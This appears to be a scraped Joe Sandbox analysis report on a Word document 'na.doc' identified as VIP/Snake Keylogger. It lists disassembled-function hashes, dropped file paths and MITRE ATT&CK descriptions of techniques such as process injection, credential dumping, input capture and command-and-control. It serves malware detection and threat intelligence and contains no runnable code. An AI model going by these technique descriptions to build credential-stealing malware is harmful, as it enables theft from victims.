Instruction Fuzzy Hash: 87C1E574E00218CFDB18DFA5D994B9DBBB2BF89300F2090A9D809AB359DB355E81CF50

Function 006298B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.659530880.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_620000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a72d3c1de8c6089f74818f5385fc58f261035032df24cdd8eb49945c69709a4
Instruction ID: 9a4b7d1dd943488fdbace321e40d69d183986fb3574c74ef0357c54dc62650ee
Opcode Fuzzy Hash: 5a72d3c1de8c6089f74818f5385fc58f261035032df24cdd8eb49945c69709a4
Instruction Fuzzy Hash: 74C1D574E00218CFDB14DFA5D994B9DBBB2BF89300F2094A9D809AB359DB355E81CF50

Function 0062D180 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.659530880.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_620000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dab40c140b3cc39b1a4f7f3705cab44343bc8b7c0e241eb684f09b50c1383610
Instruction ID: f97e621145d2b73d743493e5bde829f51a62c906261d1ff08330a4719d70bd85
Opcode Fuzzy Hash: dab40c140b3cc39b1a4f7f3705cab44343bc8b7c0e241eb684f09b50c1383610
Instruction Fuzzy Hash: 06C1C474E00228CFDB54DFA5D994B9DBBB2BF89300F2090A9D809AB359DB355E81CF50

Function 00624A80 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.659530880.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_620000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53f19c100caafd6aff94a140920a6c82b24d9a7eb065358dde278f14e507f36b
Instruction ID: a05ad7c7c326a5598be832070a1c0b3a6b7887aa99e8f5d1e26c03275dfb0a9d
Opcode Fuzzy Hash: 53f19c100caafd6aff94a140920a6c82b24d9a7eb065358dde278f14e507f36b
Instruction Fuzzy Hash: DCC1C574E00228CFDB18DFA5D954B9DBBB2BF89300F2094A9D809AB359DB355E81CF50

Function 00625788 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.659530880.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_620000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fbe071f014b544aee20c03a6f063d3b8c1ccdc37e76b6d91d3457fb0ff81a7a
Instruction ID: ad71694799d0a4a57772d769b575942ed82dc8b4fba229e571b48059494062fc
Opcode Fuzzy Hash: 5fbe071f014b544aee20c03a6f063d3b8c1ccdc37e76b6d91d3457fb0ff81a7a
Instruction Fuzzy Hash: 3BC1C574E00218CFDB54DFA5D995B9DBBB2BF89300F2090A9D809AB359DB355E81CF50

Function 00626490 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.659530880.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_620000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01619263b2aa2bdfb0bb9dadc8104bb107c186892908c5d0beb4fcaeb75cb0db
Instruction ID: b17db6c82d0491dc1b90daa98c3134d2816af775b5ee0549209ac00acd2ca1ac
Opcode Fuzzy Hash: 01619263b2aa2bdfb0bb9dadc8104bb107c186892908c5d0beb4fcaeb75cb0db
Instruction Fuzzy Hash: 7DC1D674E00218CFDB54DFA5D954B9DBBB2BF89300F2090A9D409AB359DB355E81CF50

Function 00627198 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.659530880.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_620000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 807a2e7113bc8db590ec514cda71d666f4c9b0bd7108a07d14459f6d56e096ab
Instruction ID: 935065983b7d1088080494bf72bc92a30b348179b804899e9b5b95b22b901439
Opcode Fuzzy Hash: 807a2e7113bc8db590ec514cda71d666f4c9b0bd7108a07d14459f6d56e096ab
Instruction Fuzzy Hash: 27C1D574E00228CFDB58DFA5D995B9DBBB2BF89300F2090A9D809AB355DB355E81CF50

Function 00695F28 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.659547173.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df55bac989eac56aabced88632b813aa80daeb99ef5b870791e20d1ecec4c347
Instruction ID: a183fd2dfe7e60134b88034542cf84c380d2db8c1bbddfe60f1a867c4245613b
Opcode Fuzzy Hash: df55bac989eac56aabced88632b813aa80daeb99ef5b870791e20d1ecec4c347
Instruction Fuzzy Hash: F7915A75C40325CFDB14AFA0D95C7EEBBB2AB4A306F106529D0017B2E5CBB84A88CF54

Function 00695F38 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.659547173.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02853f4b0167ddc6e22c38800265d354acdb8db23ebb3a14b1f5c1e0f6cf3cb3
Instruction ID: 5a1d1b2a861e412a39de97f71cfd7c03a01500986db137f8133ecb0c161da560
Opcode Fuzzy Hash: 02853f4b0167ddc6e22c38800265d354acdb8db23ebb3a14b1f5c1e0f6cf3cb3
Instruction Fuzzy Hash: 4A915B75D00625CFDB14AFA0D95C7EEBBB2EB0A306F106529D1017B2D9CBB84A88CF54

Function 002B6FEA Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.659301330.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b0000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e25bbf34a979ed371986bb12148c633c73abac3fce58a31897c9bcfb772f760
Instruction ID: bbc4b89eea6739570e7b7d5c2ad4eb96bc745547f0fc55dbd7568c07cebce9cd
Opcode Fuzzy Hash: 2e25bbf34a979ed371986bb12148c633c73abac3fce58a31897c9bcfb772f760
Instruction Fuzzy Hash: C1A18E74A05228CFDB65DF24D894BD9BBB2BB8A301F5085EAD40DA7354DB319E81CF50

Function 00692AF2 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.659547173.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e12651587ff078d9a5305cd468dedbd7cc69c0b578f3c3702cdddaf3aa3a34f9
Instruction ID: 4dd199acdfbd46e9f1d0100d016ffd2c94293ac53b86fe3f0085282e8b6e6a8a
Opcode Fuzzy Hash: e12651587ff078d9a5305cd468dedbd7cc69c0b578f3c3702cdddaf3aa3a34f9
Instruction Fuzzy Hash: 7251A674E00648CFDB48DFAAD99499DFBF2BF89300F248169D419AB365DB309942CF10

Function 002B71C9 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.659301330.00000000002B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b0000_cmnjgwhesilo61000.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 718010361827a5350128a582f5138fc395af994ebcd2636882eb7a3227b01c8b
Instruction ID: ae46f10257e9b29a1bd37d398b60215fa65bb0f6a79101f588cbea1a85d4798d
Opcode Fuzzy Hash: 718010361827a5350128a582f5138fc395af994ebcd2636882eb7a3227b01c8b
Instruction Fuzzy Hash: 4951A174A05228DFCB65DF24D894BE9B7B2BF4A301F6085E9D409A7354DB319E81CF50

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report na.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Exploits

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\pKL9HXcZosWfPt1[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1108CD75-6DAB-436C-B469-6FC2E69FADEC}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2B82D526-DA5E-48B6-9927-FFCE89E887B8}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9244FB79-8087-48F4-9601-4648A0A2E0FE}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C29027CA-DA85-475F-B543-7A91F61DAD71}.tmp

C:\Users\user\AppData\Local\Temp\2wnpsfdz.zui.psm1

C:\Users\user\AppData\Local\Temp\vrbipaey.i1k.ps1

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Windows Analysis Report
na.doc

Function 002C0514 Relevance: 7.6, Strings: 4, Instructions: 2627
COMMON

Function 002C1141 Relevance: 7.5, Strings: 4, Instructions: 2528
COMMON

Function 002C4924 Relevance: 1.6, APIs: 1, Instructions: 105
nativeCOMMON

Function 006E2ADC Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 327
processCOMMON

Function 006E2AE8 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 323
processCOMMON

Function 006E2748 Relevance: 1.6, APIs: 1, Instructions: 120
injectionCOMMON

Function 006E2750 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Function 006E28B0 Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Function 006E2620 Relevance: 1.6, APIs: 1, Instructions: 105
memoryCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre